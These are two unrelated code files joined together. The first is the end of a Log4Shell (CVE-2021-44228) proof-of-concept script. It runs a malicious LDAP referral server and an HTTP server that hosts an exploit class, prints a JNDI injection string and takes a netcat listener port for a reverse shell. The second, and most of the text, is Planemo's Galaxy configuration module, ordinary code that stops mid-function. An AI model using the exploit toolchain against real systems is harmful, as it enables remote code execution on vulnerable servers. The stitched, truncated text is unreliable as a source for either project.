print(Fore.GREEN + '[+] Setting up LDAP server\n')
# create the LDAP server on new thread
t1 = threading.Thread(target=ldap_server, args=(userip, webport))
t1.start()
# start the web server
print(f"[+] Starting Webserver on port {webport} http://0.0.0.0:{webport}")
httpd = HTTPServer(('0.0.0.0', webport), SimpleHTTPRequestHandler)
httpd.serve_forever()
def check_java() -> bool:
exit_code = subprocess.call([
os.path.join(CUR_FOLDER, '/home/kali/pentest/exploits/log4j/log4j-shell-poc/jdk1.8.0_102/bin/java'),
'-version',
], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
return exit_code == 0
def ldap_server(userip: str, lport: int) -> None:
sendme = "${jndi:ldap://%s:1389/a}" % (userip)
print(Fore.GREEN + f"[+] Send me: {sendme}\n")
url = "http://{}:{}/#Exploit".format(userip, lport)
subprocess.run([
os.path.join(CUR_FOLDER, "/home/kali/pentest/exploits/log4j/log4j-shell-poc/jdk1.8.0_102/bin/java"),
"-cp",
os.path.join(CUR_FOLDER, "target/marshalsec-0.0.3-SNAPSHOT-all.jar"),
"marshalsec.jndi.LDAPRefServer",
url,
])
def main() -> None:
init(autoreset=True)
print(Fore.BLUE + """
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
""")
parser = argparse.ArgumentParser(description='log4shell PoC')
parser.add_argument('--userip',
metavar='userip',
type=str,
default='localhost',
help='Enter IP for LDAPRefServer & Shell')
parser.add_argument('--webport',
metavar='webport',
type=int,
default='8000',
help='listener port for HTTP port')
parser.add_argument('--lport',
metavar='lport',
type=int,
default='9001',
help='Netcat Port')
args = parser.parse_args()
try:
if not check_java():
print(Fore.RED + '[-] Java is not installed inside the repository')
raise SystemExit(1)
payload(args.userip, args.webport, args.lport)
except KeyboardInterrupt:
print(Fore.RED + "user interrupted the program.")
raise SystemExit(0)
if __name__ == "__main__":
main()
|
config.py | """Abstractions for setting up a Galaxy instance."""
from __future__ import absolute_import
from __future__ import print_function
import abc
import contextlib
import importlib.util
import os
import random
import shutil
import threading
from string import Template
from tempfile import mkdtemp
from galaxy.containers.docker_model import DockerVolume
from galaxy.tool_util.deps import docker_util
from galaxy.util.commands import argv_to_str
from packaging.version import parse as parse_version
from six import (
add_metaclass,
iteritems
)
from six.moves import shlex_quote
from planemo import git
from planemo.config import OptionSource
from planemo.deps import ensure_dependency_resolvers_conf_configured
from planemo.docker import docker_host_args
from planemo.galaxy.workflows import remote_runnable_to_workflow_id
from planemo.io import (
communicate,
kill_pid_file,
shell,
shell_join,
untar_to,
wait_on,
warn,
write_file,
)
from planemo.mulled import build_involucro_context
from planemo.shed import tool_shed_url
from planemo.virtualenv import DEFAULT_PYTHON_VERSION
from .api import (
DEFAULT_ADMIN_API_KEY,
gi,
user_api_key,
)
from .distro_tools import (
DISTRO_TOOLS_ID_TO_PATH
)
from .run import (
setup_common_startup_args,
setup_venv,
)
from .workflows import (
find_tool_ids,
import_workflow,
install_shed_repos,
)
NO_TEST_DATA_MESSAGE = (
"planemo couldn't find a target test-data directory, you should likely "
"create a test-data directory or pass an explicit path using --test_data."
)
WEB_SERVER_CONFIG_TEMPLATE = """
[server:${server_name}]
use = egg:Paste#http
port = ${port}
host = ${host}
use_threadpool = True
threadpool_kill_thread_limit = 10800
[app:main]
paste.app_factory = galaxy.web.buildapp:app_factory
static_dir = static/
"""
TOOL_CONF_TEMPLATE = """<toolbox>
<tool file="data_source/upload.xml" />
${tool_definition}
</toolbox>
"""
SHED_TOOL_CONF_TEMPLATE = """<?xml version="1.0"?>
<toolbox tool_path="${shed_tool_path}">
</toolbox>
"""
SHED_DATA_MANAGER_CONF_TEMPLATE = """<?xml version="1.0"?>
<data_managers>
</data_managers>
"""
EMPTY_JOB_METRICS_TEMPLATE = """<?xml version="1.0"?>
<job_metrics>
</job_metrics>
"""
TOOL_SHEDS_CONF = """<tool_sheds>
<tool_shed name="Target Shed" url="${shed_target_url}" />
</tool_sheds>
"""
JOB_CONFIG_LOCAL = """<job_conf>
<plugins>
<plugin id="planemo_runner" type="runner" load="galaxy.jobs.runners.local:LocalJobRunner" workers="4"/>
</plugins>
<handlers>
<handler id="main"/>
</handlers>
<destinations default="planemo_dest">
<destination id="planemo_dest" runner="planemo_runner">
<param id="require_container">${require_container}</param>
<param id="docker_enabled">${docker_enable}</param>
<param id="docker_sudo">${docker_sudo}</param>
<param id="docker_sudo_cmd">${docker_sudo_cmd}</param>
<param id="docker_cmd">${docker_cmd}</param>
${docker_host_param}
</destination>
<destination id="upload_dest" runner="planemo_runner">
<param id="docker_enabled">false</param>
</destination>
</destinations>
<tools>
<tool id="upload1" destination="upload_dest" />
</tools>
</job_conf>
"""
LOGGING_TEMPLATE = """
## Configure Python loggers.
[loggers]
keys = root,paste,urllib,displayapperrors,galaxydeps,galaxytoolsactions,galaxymasterapikey,galaxy
[handlers]
keys = console
[formatters]
keys = generic
[logger_root]
level = WARN
handlers = console
[logger_paste]
level = WARN
handlers = console
qualname = paste
propagate = 0
[logger_urllib]
level = WARN
handlers = console
qualname = urllib3
propagate = 0
[logger_galaxydeps]
level = DEBUG
handlers = console
qualname = galaxy.tools.deps
propagate = 0
[logger_galaxytoolsactions]
level = DEBUG
handlers = console
qualname = galaxy.tools.actions
propagate = 0
[logger_galaxymasterapikey]
level = WARN
handlers = console
qualname = galaxy.web.framework.webapp
propagate = 0
[logger_displayapperrors]
level = ERROR
handlers =
qualname = galaxy.datatypes.display_applications.application
propagate = 0
[logger_galaxy]
level = ${log_level}
handlers = console
qualname = galaxy
propagate = 0
[handler_console]
class = StreamHandler
args = (sys.stderr,)
level = DEBUG
formatter = generic
[formatter_generic]
format = %(asctime)s %(levelname)-5.5s [%(name)s] %(message)s
"""
REFGENIE_CONFIG_TEMPLATE = """
config_version: %s
genome_folder: '%s'
genome_servers: ['http://refgenomes.databio.org']
genomes: null
"""
EMPTY_TOOL_CONF_TEMPLATE = """<toolbox></toolbox>"""
GX_TEST_TOOL_PATH = "$GALAXY_FUNCTIONAL_TEST_TOOLS"
DEFAULT_GALAXY_BRANCH = "master"
DEFAULT_GALAXY_SOURCE = "https://github.com/galaxyproject/galaxy"
CWL_GALAXY_SOURCE = "https://github.com/common-workflow-language/galaxy"
DATABASE_LOCATION_TEMPLATE = "sqlite:///%s?isolation_level=IMMEDIATE"
COMMAND_STARTUP_COMMAND = './scripts/common_startup.sh ${COMMON_STARTUP_ARGS}'
CLEANUP_IGNORE_ERRORS = True
DEFAULT_GALAXY_BRAND = 'Configured by Planemo'
DEFAULT_TOOL_INSTALL_TIMEOUT = 60 * 60 * 1
UNINITIALIZED = object()
@contextlib.contextmanager
def galaxy_config(ctx, runnables, **kwds):
"""Set up a ``GalaxyConfig`` in an auto-cleaned context."""
c = local_galaxy_config
if kwds.get("dockerize", False):
c = docker_galaxy_config
elif kwds.get("external", False):
c = external_galaxy_config
log_thread = None
try:
with c(ctx, runnables, **kwds) as config:
if kwds.get('daemon'):
log_thread = threading.Thread(target=read_log, args=(ctx, config.log_file))
log_thread.daemon = True
log_thread.start()
yield config
finally:
if log_thread:
log_thread.join(1)
def read_log(ctx, log_path):
log_fh = None
e = threading.Event()
try:
while e:
if os.path.exists(log_path):
if not log_fh:
# Open in append so we start at the end of the log file
log_fh = open(log_path, 'a+')
log_lines = log_fh.read()
if log_lines:
ctx.log(log_lines)
e.wait(1)
finally:
if log_fh:
log_fh.close()
def simple_docker_volume(path):
path = os.path.abspath(path)
return DockerVolume("%s:%s:rw" % (path, path))
@contextlib.contextmanager
def docker_galaxy_config(ctx, runnables, for_tests=False, **kwds):
"""Set up a ``GalaxyConfig`` for Docker container."""
test_data_dir = _find_test_data(runnables, **kwds)
with _config_directory(ctx, **kwds) as config_directory:
def config_join(*args):
return os.path.join(config_directory, *args)
ensure_dependency_resolvers_conf_configured(ctx, kwds, os.path.join(config_directory, "resolvers_conf.xml"))
_handle_job_metrics(config_directory, kwds)
galaxy_root = kwds.get('galaxy_root')
_handle_refgenie_config(config_directory, galaxy_root, kwds)
shed_tool_conf = "config/shed_tool_conf.xml"
all_tool_paths = _all_tool_paths(runnables, galaxy_root, kwds.get('extra_tools'))
tool_directories = set([]) # Things to mount...
for tool_path in all_tool_paths:
directory = os.path.dirname(os.path.normpath(tool_path))
if os.path.exists(directory):
tool_directories.add(directory)
# TODO: remap these.
tool_volumes = []
for tool_directory in tool_directories:
volume = simple_docker_volume(tool_directory)
tool_volumes.append(volume)
empty_tool_conf = config_join("empty_tool_conf.xml")
tool_conf = config_join("tool_conf.xml")
shed_tool_path = kwds.get("shed_tool_path") or config_join("shed_tools")
_ensure_directory(shed_tool_path)
sheds_config_path = _configure_sheds_config_file(
ctx, config_directory, **kwds
)
port = _get_port(kwds)
properties = _shared_galaxy_properties(config_directory, kwds, for_tests=for_tests)
_handle_container_resolution(ctx, kwds, properties)
master_api_key = _get_master_api_key(kwds)
template_args = dict(
shed_tool_path=shed_tool_path,
tool_conf=tool_conf,
)
tool_config_file = "%s,%s" % (tool_conf, shed_tool_conf)
_write_tool_conf(ctx, all_tool_paths, tool_conf)
write_file(empty_tool_conf, EMPTY_TOOL_CONF_TEMPLATE)
properties.update(dict(
tool_config_file=tool_config_file,
tool_sheds_config_file=sheds_config_path,
migrated_tools_config=empty_tool_conf,
))
server_name = "planemo%d" % random.randint(0, 100000)
# Value substitutions in Galaxy properties - for consistency with
# non-Dockerized version.
template_args = dict(
)
env = _build_env_for_galaxy(properties, template_args)
env["NONUSE"] = "nodejs,proftp,reports"
if ctx.verbose:
env["GALAXY_LOGGING"] = "full"
# TODO: setup FTP upload dir and disable FTP server in container.
_build_test_env(properties, env)
docker_target_kwds = docker_host_args(**kwds)
volumes = tool_volumes + [simple_docker_volume(config_directory)]
export_directory = kwds.get("export_directory", None)
if export_directory is not None:
volumes.append(DockerVolume("%s:/export:rw" % export_directory))
# TODO: Allow this to real Docker volumes and allow multiple.
extra_volume = kwds.get("docker_extra_volume")
if extra_volume:
volumes.append(simple_docker_volume(extra_volume))
yield DockerGalaxyConfig(
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
docker_target_kwds=docker_target_kwds,
volumes=volumes,
export_directory=export_directory,
kwds=kwds,
)
@contextlib.contextmanager
def local_galaxy_config(ctx, runnables, for_tests=False, **kwds):
"""Set up a ``GalaxyConfig`` in an auto-cleaned context."""
test_data_dir = _find_test_data(runnables, **kwds)
tool_data_table = _find_tool_data_table(
runnables,
test_data_dir=test_data_dir,
**kwds
)
data_manager_config_paths = [r.data_manager_conf_path for r in runnables if r.data_manager_conf_path]
galaxy_root = _find_galaxy_root(ctx, **kwds)
install_galaxy = kwds.get("install_galaxy", False)
if galaxy_root is not None:
if os.path.isdir(galaxy_root) and not os.listdir(galaxy_root):
os.rmdir(galaxy_root)
if os.path.isdir(galaxy_root) and install_galaxy:
raise Exception("%s is an existing non-empty directory, cannot install Galaxy again" % galaxy_root)
# Duplicate block in docker variant above.
if kwds.get("mulled_containers", False):
if not kwds.get("docker", False):
if ctx.get_option_source("docker") != OptionSource.cli:
kwds["docker"] = True
else:
raise Exception("Specified no docker and mulled containers together.")
conda_default_options = ('conda_auto_init', 'conda_auto_install')
use_conda_options = ('dependency_resolution', 'conda_use_local', 'conda_prefix', 'conda_exec')
if not any(kwds.get(_) for _ in use_conda_options) and all(ctx.get_option_source(_) == OptionSource.default for _ in conda_default_options):
# If using mulled_containers and default conda options disable conda resolution
kwds['no_dependency_resolution'] = kwds['no_conda_auto_init'] = True
with _config_directory(ctx, **kwds) as config_directory:
def config_join(*args):
return os.path.join(config_directory, *args)
install_env = {}
if kwds.get('galaxy_skip_client_build', True):
install_env['GALAXY_SKIP_CLIENT_BUILD'] = '1'
if galaxy_root is None:
galaxy_root = config_join("galaxy-dev")
if not os.path.isdir(galaxy_root):
_install_galaxy(ctx, galaxy_root, install_env, kwds)
if parse_version(kwds.get('galaxy_python_version') or DEFAULT_PYTHON_VERSION) >= parse_version('3'):
# on python 3 we use gunicorn,
# which requires 'main' as server name
server_name = 'main'
else:
server_name = "planemo%d" % random.randint(0, 100000)
# Once we don't have to support earlier than 18.01 - try putting these files
# somewhere better than with Galaxy.
log_file = "%s.log" % server_name
pid_file = "%s.pid" % server_name
ensure_dependency_resolvers_conf_configured(ctx, kwds, os.path.join(config_directory, "resolvers_conf.xml"))
_handle_job_config_file(config_directory, server_name, kwds)
_handle_job_metrics(config_directory, kwds)
_handle_refgenie_config(config_directory, galaxy_root, kwds)
file_path = kwds.get("file_path") or config_join("files")
_ensure_directory(file_path)
tool_dependency_dir = kwds.get("tool_dependency_dir") or config_join("deps")
_ensure_directory(tool_dependency_dir)
shed_tool_conf = kwds.get("shed_tool_conf") or config_join("shed_tools_conf.xml")
all_tool_paths = _all_tool_paths(runnables, galaxy_root=galaxy_root, extra_tools=kwds.get('extra_tools'))
empty_tool_conf = config_join("empty_tool_conf.xml")
tool_conf = config_join("tool_conf.xml")
shed_data_manager_config_file = config_join("shed_data_manager_conf.xml")
shed_tool_path = kwds.get("shed_tool_path") or config_join("shed_tools")
_ensure_directory(shed_tool_path)
sheds_config_path = _configure_sheds_config_file(
ctx, config_directory, **kwds
)
database_location = config_join("galaxy.sqlite")
master_api_key = _get_master_api_key(kwds)
dependency_dir = os.path.join(config_directory, "deps")
_ensure_directory(shed_tool_path)
port = _get_port(kwds)
template_args = dict(
port=port,
host=kwds.get("host", "127.0.0.1"),
server_name=server_name,
temp_directory=config_directory,
shed_tool_path=shed_tool_path,
database_location=database_location,
tool_conf=tool_conf,
debug=kwds.get("debug", "true"),
id_secret=kwds.get("id_secret", "test_secret"),
log_level="DEBUG" if ctx.verbose else "INFO",
)
tool_config_file = "%s,%s" % (tool_conf, shed_tool_conf)
# Setup both galaxy_email and older test user test@bx.psu.edu
# as admins for command_line, etc...
properties = _shared_galaxy_properties(config_directory, kwds, for_tests=for_tests)
properties.update(dict(
server_name="main",
ftp_upload_dir_template="${ftp_upload_dir}",
ftp_upload_purge="False",
ftp_upload_dir=test_data_dir or os.path.abspath('.'),
ftp_upload_site="Test Data",
check_upload_content="False",
tool_dependency_dir=dependency_dir,
file_path=file_path,
new_file_path="${temp_directory}/tmp",
tool_config_file=tool_config_file,
tool_sheds_config_file=sheds_config_path,
manage_dependency_relationships="False",
job_working_directory="${temp_directory}/job_working_directory",
template_cache_path="${temp_directory}/compiled_templates",
citation_cache_type="file",
citation_cache_data_dir="${temp_directory}/citations/data",
citation_cache_lock_dir="${temp_directory}/citations/lock",
database_auto_migrate="True",
enable_beta_tool_formats="True",
id_secret="${id_secret}",
log_level="${log_level}",
debug="${debug}",
watch_tools="auto",
default_job_shell="/bin/bash", # For conda dependency resolution
tool_data_table_config_path=tool_data_table,
data_manager_config_file=",".join(data_manager_config_paths) or None, # without 'or None' may raise IOError in galaxy (see #946)
integrated_tool_panel_config=("${temp_directory}/"
"integrated_tool_panel_conf.xml"),
migrated_tools_config=empty_tool_conf,
test_data_dir=test_data_dir, # TODO: make gx respect this
shed_data_manager_config_file=shed_data_manager_config_file,
))
_handle_container_resolution(ctx, kwds, properties)
write_file(config_join("logging.ini"), _sub(LOGGING_TEMPLATE, template_args))
properties["database_connection"] = _database_connection(database_location, **kwds)
_handle_kwd_overrides(properties, kwds)
# TODO: consider following property
# watch_tool = False
# datatypes_config_file = config/datatypes_conf.xml
# welcome_url = /static/welcome.html
# logo_url = /
# sanitize_all_html = True
# serve_xss_vulnerable_mimetypes = False
# track_jobs_in_database = None
# outputs_to_working_directory = False
# retry_job_output_collection = 0
env = _build_env_for_galaxy(properties, template_args)
env.update(install_env)
_build_test_env(properties, env)
env['GALAXY_TEST_SHED_TOOL_CONF'] = shed_tool_conf
env['GALAXY_TEST_DBURI'] = properties["database_connection"]
env["GALAXY_TEST_UPLOAD_ASYNC"] = "false"
env["GALAXY_TEST_LOGGING_CONFIG"] = config_join("logging.ini")
env["GALAXY_DEVELOPMENT_ENVIRONMENT"] = "1"
# disable all access log messages from uvicorn
env["GALAXY_TEST_DISABLE_ACCESS_LOG"] = "False"
# Following are needed in 18.01 to prevent Galaxy from changing log and pid.
# https://github.com/galaxyproject/planemo/issues/788
env["GALAXY_LOG"] = log_file
env["GALAXY_PID"] = pid_file
web_config = _sub(WEB_SERVER_CONFIG_TEMPLATE, template_args)
write_file(config_join("galaxy.ini"), web_config)
_write_tool_conf(ctx, all_tool_paths, tool_conf)
write_file(empty_tool_conf, EMPTY_TOOL_CONF_TEMPLATE)
shed_tool_conf_contents = _sub(SHED_TOOL_CONF_TEMPLATE, template_args)
# Write a new shed_tool_conf.xml if needed.
write_file(shed_tool_conf, shed_tool_conf_contents, force=False)
write_file(shed_data_manager_config_file, SHED_DATA_MANAGER_CONF_TEMPLATE)
yield LocalGalaxyConfig(
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
galaxy_root,
kwds,
)
def _expand_paths(galaxy_root, extra_tools):
"""Replace $GALAXY_FUNCTION_TEST_TOOLS with actual path."""
if galaxy_root:
extra_tools = [path if path != GX_TEST_TOOL_PATH else os.path.join(galaxy_root, 'test/functional/tools') for path in extra_tools]
return extra_tools
def get_galaxy_major_version(galaxy_root):
spec = importlib.util.spec_from_file_location('__galaxy_version', os.path.join(galaxy_root, 'lib', 'galaxy', 'version.py'))
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
return parse_version(module.VERSION_MAJOR)
def get_refgenie_config(galaxy_root, refgenie_dir):
config_version = 0.4
if galaxy_root:
version_major = get_galaxy_major_version(galaxy_root=galaxy_root)
if version_major < parse_version('21.09'):
config_version = 0.3
return REFGENIE_CONFIG_TEMPLATE % (config_version, refgenie_dir)
def _all_tool_paths(runnables, galaxy_root=None, extra_tools=None):
extra_tools = extra_tools or []
all_tool_paths = [r.path for r in runnables if r.has_tools and not r.data_manager_conf_path]
extra_tools = _expand_paths(galaxy_root, extra_tools=extra_tools)
all_tool_paths.extend(extra_tools)
for runnable in runnables:
if runnable.type.name == "galaxy_workflow":
tool_ids = find_tool_ids(runnable.path)
for tool_id in tool_ids:
tool_paths = DISTRO_TOOLS_ID_TO_PATH.get(tool_id)
if tool_paths:
if isinstance(tool_paths, str):
tool_paths = [tool_paths]
all_tool_paths.extend(tool_paths)
return all_tool_paths
def _shared_galaxy_properties(config_directory, kwds, for_tests):
"""Setup properties useful for local and Docker Galaxy instances.
Most things related to paths, etc... are very different between Galaxy
modalities and many taken care of internally to the container in that mode.
But this method sets up API stuff, tool, and job stuff that can be shared.
"""
master_api_key = _get_master_api_key(kwds)
user_email = _user_email(kwds)
properties = {
'master_api_key': master_api_key,
'admin_users': "%s,test@bx.psu.edu" % user_email,
'expose_dataset_path': "True",
'cleanup_job': 'never',
'collect_outputs_from': "job_working_directory",
'allow_path_paste': "True",
'check_migrate_tools': "False",
'use_cached_dependency_manager': str(kwds.get("conda_auto_install", False)),
'brand': kwds.get("galaxy_brand", DEFAULT_GALAXY_BRAND),
'strict_cwl_validation': str(not kwds.get("non_strict_cwl", False)),
}
if kwds.get("galaxy_single_user", True):
properties['single_user'] = user_email
if for_tests:
empty_dir = os.path.join(config_directory, "empty")
_ensure_directory(empty_dir)
properties["tour_config_dir"] = empty_dir
properties["interactive_environment_plugins_directory"] = empty_dir
properties["visualization_plugins_directory"] = empty_dir
properties["refgenie_config_file"] = kwds.get('refgenie_config_file', '')
return properties
@contextlib.contextmanager
def external_galaxy_config(ctx, runnables, for_tests=False, **kwds):
yield BaseGalaxyConfig(
ctx=ctx,
galaxy_url=kwds.get("galaxy_url", None),
master_api_key=_get_master_api_key(kwds),
user_api_key=kwds.get("galaxy_user_key", None),
runnables=runnables,
kwds=kwds
)
def _get_master_api_key(kwds):
master_api_key = kwds.get("galaxy_admin_key") or DEFAULT_ADMIN_API_KEY
return master_api_key
def _get_port(kwds):
port = int(kwds.get("port", 9090))
return port
def _user_email(kwds):
user_email = kwds.get("galaxy_email")
return user_email
@contextlib.contextmanager
def _config_directory(ctx, **kwds):
config_directory = kwds.get("config_directory", None)
created_config_directory = False
if not config_directory:
created_config_directory = True
config_directory = os.path.realpath(mkdtemp())
ctx.vlog("Created directory for Galaxy configuration [%s]" % config_directory)
try:
yield config_directory
finally:
cleanup = not kwds.get("no_cleanup", False)
if created_config_directory and cleanup:
shutil.rmtree(config_directory)
@add_metaclass(abc.ABCMeta)
class GalaxyInterface(object):
"""Abstraction around a Galaxy instance.
Description of a Galaxy instance and how to interact with it - this could
potentially be a remote, already running instance or an instance Planemo manages
to execute some task(s).
"""
@abc.abstractproperty
def gi(self):
"""Return an admin bioblend Galaxy instance for API interactions."""
@abc.abstractproperty
def user_gi(self):
"""Return a user-backed bioblend Galaxy instance for API interactions."""
@abc.abstractmethod
def install_repo(self, *args, **kwds):
"""Install specified tool shed repository."""
@abc.abstractproperty
def tool_shed_client(self):
"""Return a admin bioblend tool shed client."""
@abc.abstractmethod
def wait_for_all_installed(self):
"""Wait for all queued up repositories installs to complete."""
@abc.abstractmethod
def install_workflows(self):
"""Install all workflows configured with these planemo arguments."""
@abc.abstractmethod
def workflow_id(self, path):
"""Get installed workflow API ID for input path."""
@abc.abstractproperty
def version_major(self):
"""Return target Galaxy version."""
@abc.abstractproperty
def user_api_config(self):
"""Return the API indicated configuration for user session.
Calling .config.get_config() with admin GI session would yield
a different object (admins have different view of Galaxy's
configuration).
"""
@property
def user_is_admin(self):
return self.user_api_config["is_admin_user"]
@add_metaclass(abc.ABCMeta)
class GalaxyConfig(GalaxyInterface):
"""Specialization of GalaxyInterface for Galaxy instances Planemo manages itself.
This assumes more than an API connection is available - Planemo needs to be able to
start and stop the Galaxy instance, recover logs, etc... There are currently two
implementations - a locally executed Galaxy and one running inside a Docker containe
"""
@abc.abstractproperty
def kill(self):
"""Stop the running instance."""
@abc.abstractmethod
def startup_command(self, ctx, **kwds):
"""Return a shell command used to startup this instance.
Among other common planmo kwds, this should respect the
``daemon`` keyword.
"""
@abc.abstractproperty
def log_contents(self):
"""Retrieve text of log for running Galaxy instance."""
@abc.abstractmethod
def cleanup(self):
"""Cleanup allocated resources to run this instance."""
@abc.abstractproperty
def use_path_paste(self):
"""Use path paste to upload data.
This will only be an option if the target user key is an
admin user key.
"""
class BaseGalaxyConfig(GalaxyInterface):
def __init__(
self,
ctx,
galaxy_url,
master_api_key,
user_api_key,
runnables,
kwds,
):
self._ctx = ctx
self.galaxy_url = galaxy_url
self.master_api_key = master_api_key
self._user_api_key = user_api_key
self.runnables = runnables
self._kwds = kwds
self._workflow_ids = {}
self.installed_repos = {}
self.updated_repos = {}
self._target_version = UNINITIALIZED
self._target_user_config = UNINITIALIZED
@property
def gi(self):
assert self.galaxy_url
return gi(url=self.galaxy_url, key=self.master_api_key)
@property
def user_gi(self):
user_api_key = self.user_api_key
assert user_api_key
return self._gi_for_key(user_api_key)
@property
def user_api_key(self):
# TODO: thread-safe
if self._user_api_key is None:
# TODO: respect --galaxy_email - seems like a real bug
self._user_api_key = user_api_key(self.gi)
return self._user_api_key
def _gi_for_key(self, key):
assert self.galaxy_url
return gi(url=self.galaxy_url, key=key)
def install_repo(self, *args, **kwds):
self.tool_shed_client.install_repository_revision(
*args, **kwds
)
@property
def tool_shed_client(self):
return self.gi.toolShed
def wait_for_all_installed(self):
def status_ready(repo):
status = repo["status"]
if status in ["Installing", "New"]:
return None
if status == "Installed":
return True
raise Exception("Error installing repo status is %s" % status)
def ready():
repos = self.tool_shed_client.get_repositories()
ready = all(map(status_ready, repos))
return ready or None
wait_on(ready, "galaxy tool installation", timeout=DEFAULT_TOOL_INSTALL_TIMEOUT)
def install_workflows(self):
for runnable in self.runnables:
if runnable.type.name in ["galaxy_workflow", "cwl_workflow"] and not runnable.is_remote_workflow_uri:
self._install_workflow(runnable)
def _install_workflow(self, runnable):
if self._kwds.get("shed_install") and (self._kwds.get("engine") != "external_galaxy" or self._kwds.get("galaxy_admin_key")):
workflow_repos = install_shed_repos(runnable,
self.gi,
self._kwds.get("ignore_dependency_problems", False),
self._kwds.get("install_tool_dependencies", False),
self._kwds.get("install_resolver_dependencies", True),
self._kwds.get("install_repository_dependencies", True),
self._kwds.get("install_most_recent_revision", False)
)
self.installed_repos[runnable.path], self.updated_repos[runnable.path] = workflow_repos
default_from_path = self._kwds.get("workflows_from_path", False)
# TODO: Allow serialization so this doesn't need to assume a
# shared filesystem with Galaxy server.
from_path = default_from_path or (runnable.type.name == "cwl_workflow")
workflow = import_workflow(
runnable.path, admin_gi=self.gi, user_gi=self.user_gi, from_path=from_path
)
self._workflow_ids[runnable.path] = workflow["id"]
def workflow_id_for_runnable(self, runnable):
if runnable.is_remote_workflow_uri:
workflow_id = remote_runnable_to_workflow_id(runnable)
else:
workflow_id = self.workflow_id(runnable.path)
return workflow_id
def workflow_id(self, path):
return self._workflow_ids[path]
@property
def use_path_paste(self):
option = self._kwds.get("paste_test_data_paths")
if option is None:
return self.default_use_path_paste
else:
return option
@property
def default_use_path_paste(self):
return False
@property
def version_major(self):
"""Return target Galaxy version."""
if self._target_version is UNINITIALIZED:
self._target_version = self.user_gi.config.get_version()["version_major"]
return self._target_version
@property
def user_api_config(self):
"""Return the API indicated configuration for user session."""
if self._target_user_config is UNINITIALIZED:
self._target_user_config = self.user_gi.config.get_config()
return self._target_user_config
class BaseManagedGalaxyConfig(BaseGalaxyConfig):
def __init__(
self,
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
kwds,
):
galaxy_url = "http://localhost:%d" % port
super(BaseManagedGalaxyConfig, self).__init__(
ctx=ctx,
galaxy_url=galaxy_url,
master_api_key=master_api_key,
user_api_key=None,
runnables=runnables,
kwds=kwds
)
self.config_directory = config_directory
self.env = env
self.test_data_dir = test_data_dir
self.port = port
self.server_name = server_name
class DockerGalaxyConfig(BaseManagedGalaxyConfig):
"""A :class:`GalaxyConfig` description of a Dockerized Galaxy instance."""
def __init__(
self,
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
docker_target_kwds,
volumes,
export_directory,
kwds,
):
super(DockerGalaxyConfig, self).__init__(
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
kwds,
)
self.docker_target_kwds = docker_target_kwds
self.volumes = volumes
self.export_directory = export_directory
def kill(self):
"""Kill planemo container..."""
kill_command = docker_util.kill_command(
self.server_name,
**self.docker_target_kwds
)
return shell(kill_command)
def startup_command(self, ctx, **kwds):
"""Return a shell command used to startup this instance.
Among other common planmo kwds, this should respect the
``daemon`` keyword.
"""
daemon = kwds.get("daemon", False)
daemon_str = "" if not daemon else " -d"
docker_run_extras = "-p %s:80%s" % (self.port, daemon_str)
env_directives = ["%s='%s'" % item for item in self.env.items()]
image = kwds.get("docker_galaxy_image", "bgruening/galaxy-stable")
run_command = docker_util.build_docker_run_command(
"", image,
interactive=False,
env_directives=env_directives,
working_directory=None,
name=self.server_name,
run_extra_arguments=docker_run_extras,
set_user=False,
volumes=self.volumes,
**self.docker_target_kwds
)
chmod_command = [
"chmod",
"-R",
"o+rwx",
self.config_directory,
]
if self.export_directory:
chmod_command.append(self.export_directory)
return shell_join(
argv_to_str(chmod_command),
run_command,
)
@property
def log_contents(self):
logs_command = docker_util.logs_command(
self.server_name,
**self.docker_target_kwds
)
output, _ = communicate(
logs_command
)
return output
def cleanup(self):
shutil.rmtree(self.config_directory, CLEANUP_IGNORE_ERRORS)
class LocalGalaxyConfig(BaseManagedGalaxyConfig):
"""A local, non-containerized implementation of :class:`GalaxyConfig`."""
def __init__(
self,
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
galaxy_root,
kwds,
):
super(LocalGalaxyConfig, self).__init__(
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
kwds,
)
self.galaxy_root = galaxy_root
def kill(self):
if self._ctx.verbose:
shell(["ps", "ax"])
exists = os.path.exists(self.pid_file)
print("Killing pid file [%s]" % self.pid_file)
print("pid_file exists? [%s]" % exists)
if exists:
print("pid_file contents are [%s]" % open(self.pid_file, "r").read())
kill_pid_file(self.pid_file)
def startup_command(self, ctx, **kwds):
"""Return a shell command used to startup this instance.
Among other common planemo kwds, this should respect the
``daemon`` keyword.
"""
daemon = kwds.get("daemon", False)
# TODO: Allow running dockerized Galaxy here instead.
setup_venv_command = setup_venv(ctx, kwds)
run_script = "%s $COMMON_STARTUP_ARGS" % shlex_quote(os.path.join(self.galaxy_root, "run.sh"))
if daemon:
run_script += " --daemon"
self.env["GALAXY_RUN_ALL"] = "1"
else:
run_script += " --server-name %s" % shlex_quote(self.server_name)
server_ini = os.path.join(self.config_directory, "galaxy.ini")
self.env["GALAXY_CONFIG_FILE"] = server_ini
if parse_version(kwds.get('galaxy_python_version') or DEFAULT_PYTHON_VERSION) >= parse_version('3'):
# We need to start under gunicorn
self.env['APP_WEBSERVER'] = 'gunicorn'
self.env['GUNICORN_CMD_ARGS'] = "--timeout={timeout} --capture-output --bind={host}:{port} --name={server_name}".format(
timeout=DEFAULT_TOOL_INSTALL_TIMEOUT,
host=kwds.get('host', '127.0.0.1'),
port=kwds['port'],
server_name=self.server_name,
)
cd_to_galaxy_command = ['cd', self.galaxy_root]
return shell_join(
cd_to_galaxy_command,
setup_venv_command,
setup_common_startup_args(),
run_script,
)
@property
def log_file(self):
"""Log file used when planemo serves this Galaxy instance."""
file_name = "%s.log" % self.server_name
return os.path.join(self.galaxy_root, file_name)
@property
def pid_file(self):
pid_file_name = "%s.pid" % self.server_name
return os.path.join(self.galaxy_root, pid_file_name)
@property
def log_contents(self):
if not os.path.exists(self.log_file):
return ""
with open(self.log_file, "r") as f:
return f.read()
def cleanup(self):
